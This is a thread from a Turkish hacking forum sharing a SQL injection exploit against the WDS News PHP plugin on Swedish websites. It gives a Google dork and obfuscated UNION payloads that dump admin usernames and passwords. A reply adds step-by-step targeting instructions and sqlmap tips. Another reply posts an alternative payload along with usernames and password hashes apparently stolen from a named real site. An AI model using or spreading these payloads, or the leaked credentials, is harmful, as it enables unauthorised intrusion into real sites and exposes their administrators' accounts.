WDS News SQL İnjection Exploit (İsveç)

HACKROOT

HACKROOT

Üye
26 Haz 2016
158
81
uid=0(root)
Merhaba SQL açığı ile wds news PHP haber eklentisinin açığı paylaşayım sadece isveç domain uzantılarında kullanılıyor sonuçlar az ama dursun çoğalır, atmak istemedim


Exploit Başlık;
Wds News "Article" SQL İnjection

Exploit Yazarı:
HACKROOT

Exploit Dork;
inurl:wds_news (Türetilebilir)

Exploit Poc;
/wds_news/article.php?ID=-9694/*!UnioN*//*--*//*!alL*//*--*//*!SelEcT*/1,GRouP_cOnCat(0x3a,admin_id,0x3a,username,0x3a,password),3,4,5,6,7,8,9,10/*--*//*!FroM*/cms_admin

Kullanımı;
Dork kelimesi google ile aratılır exploit poc domain uzantısının sonuna eklenir

Örnek Kullanım;
site.se/[Exploit Poc]

Selam ve dua ile;
 
xmajestar

xmajestar

Katılımcı Üye
13 Ocak 2021
624
2
105
tzdata-TR
Eline sağlık çok Güzel kullanımı detaylı belirtim kullanamayanlar kullansın adım adım

Arkadaşlar şimdi googleye dorku yazın

inurl:wds_news site:SE

+Arattıktan sonra
+Çıkan sitelere girin
+Url sonuna direkt bunu yapıştırın

/wds_news/article.php?ID=-9694/*!UnioN*//*--*//*!alL*//*--*//*!SelEcT*/1,GRouP_cOnCat(0x3a,admin_id,0x3a,username,0x3a,password),3,4,5,6,7,8,9,10/*--*//*!FroM*/cms_admin

+ Gelen bilgiler admin, k.adları, şifreler
Kodlar 03xa fln hexle yapılmış çok site bulamassanızda boşverin

+ sqlmap ile bildiğimiz yoldan gidin bazı veritabanları bomboş görünebilir db yi cektikten sonra jsql ile bidaha tarayın siteleri %50 geri kalan database gelir önünüze
 
Liprow

Liprow

Katılımcı Üye
15 Şub 2021
415
532
Şimdi öyle bir anlatmışsınız ki sanki .se uzantılı bütün sitelerde tepki alacakmışsınız gibi.d "inurl:wds_news site:se" verdiğiniz dork'da zaten 6, 7 site var. Türetelim mesela inurl:wds_news?id=5 site:se olsun. Url farkı görsenizde server aynı bütün sitelerin. A sitesinde de cms_admin B sitesinde de cms_admin. Hem exploit demek için Union, group_concat, from vs bypass lamışsınız sanırım da gerek yoktu çünkü ortada bir exploit yok.d UNION SELECT 1,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(cms_admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x203a3a20,0x3a,0x203a3a20,password,0x3c62723e))))x),3,4,5,6,7,8,9,10 --+ Bir waf yok ortada bunuda kullanın iş yapar.😉

Hem | Friends of Kabondo

friendsofkabondo.se friendsofkabondo.se

Margareta :: : ::
8f38b39cdabe38d6d9fc29aa4ea98aacc47e1e2a
Ingrid
:: : ::
56640152cd57afebe89bad4e17ee889cd8aab0a5
Bo
:: : ::
37bdd82b54b25f584a868951487aacf0ec95be2a
LGB
:: : ::
09bf181ff1bd974f6a4d33bbfd2785ab021b1606
Tony
:: : ::
16eaf1ebf550049f9927a524ad662d9a432d6e2a

Sizin Exploitten.d
 
Son düzenleme:
HACKROOT

HACKROOT

Üye
26 Haz 2016
158
81
uid=0(root)
Liprow' Alıntı:
Şimdi öyle bir anlatmışsınız ki sanki .se uzantılı bütün sitelerde tepki alacakmışsınız gibi.d "inurl:wds_news site:se" verdiğiniz dork'da zaten 6, 7 site var. Türetelim mesela inurl:wds_news?id=5 site:se olsun. Url farkı görsenizde server aynı bütün sitelerin. A sitesinde de cms_admin B sitesinde de cms_admin. Hem exploit demek için Union, group_concat, from vs bypass lamışsınız sanırım da gerek yoktu çünkü ortada bir exploit yok.d UNION SELECT 1,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(cms_admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x203a3a20,0x3a,0x203a3a20,password,0x3c62723e))))x),3,4,5,6,7,8,9,10 --+ Bir waf yok ortada bunuda kullanın iş yapar.😉

Hem | Friends of Kabondo

friendsofkabondo.se friendsofkabondo.se

Margareta :: : ::
8f38b39cdabe38d6d9fc29aa4ea98aacc47e1e2a
Ingrid
:: : ::
56640152cd57afebe89bad4e17ee889cd8aab0a5
Bo
:: : ::
37bdd82b54b25f584a868951487aacf0ec95be2a
LGB
:: : ::
09bf181ff1bd974f6a4d33bbfd2785ab021b1606
Tony
:: : ::
16eaf1ebf550049f9927a524ad662d9a432d6e2a

Sizin Exploitten.d
Genişletmek için tıkla ...
 
AwiR

AwiR

Katılımcı Üye
4 Ocak 2020
503
1
211
HACKROOT' Alıntı:
Merhaba SQL açığı ile wds news PHP haber eklentisinin açığı paylaşayım sadece isveç domain uzantılarında kullanılıyor sonuçlar az ama dursun çoğalır, atmak istemedim


Exploit Başlık;
Wds News "Article" SQL İnjection

Exploit Yazarı:
HACKROOT

Exploit Dork;
inurl:wds_news (Türetilebilir)

Exploit Poc;
/wds_news/article.php?ID=-9694/*!UnioN*//*--*//*!alL*//*--*//*!SelEcT*/1,GRouP_cOnCat(0x3a,admin_id,0x3a,username,0x3a,password),3,4,5,6,7,8,9,10/*--*//*!FroM*/cms_admin

Kullanımı;
Dork kelimesi google ile aratılır exploit poc domain uzantısının sonuna eklenir

Örnek Kullanım;
site.se/[Exploit Poc]

Selam ve dua ile;
Genişletmek için tıkla ...
Eline sağlık.
 
HACKROOT

HACKROOT

Üye
26 Haz 2016
158
81
uid=0(root)
Öncelikle seninde eline sağlık paylaşımına renk kattığın için teşekkür ederim ama bunu senin yaptığın gibi şov olması için değil grup üyelerine yararı dokunur diye paylaşma gereği duydum konuya böyle bir yorum yakışmadı.

Ben zaten söylemişim az sonuç çıkıyor ileride çoğalabilir diye, Ülke ayrı olsada server farklı gibi bir kelime kullanmışsın zaten amaç budur bunun için "Exploit" yazılır bu sadece web için geçerli değil bir yerde bir zaafiyet varsa bu tekil veya çoğul olsa bile bu poc'u kullanarak sömürülür yani yok dediğiniz şey zaten bir exploittir.
Gereksiz gösteri yapmanın anlamı yok bildiğim birşey varsa paylaşabilirsin yorumda ama konuya böyle bir üslup yakışmıyor
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.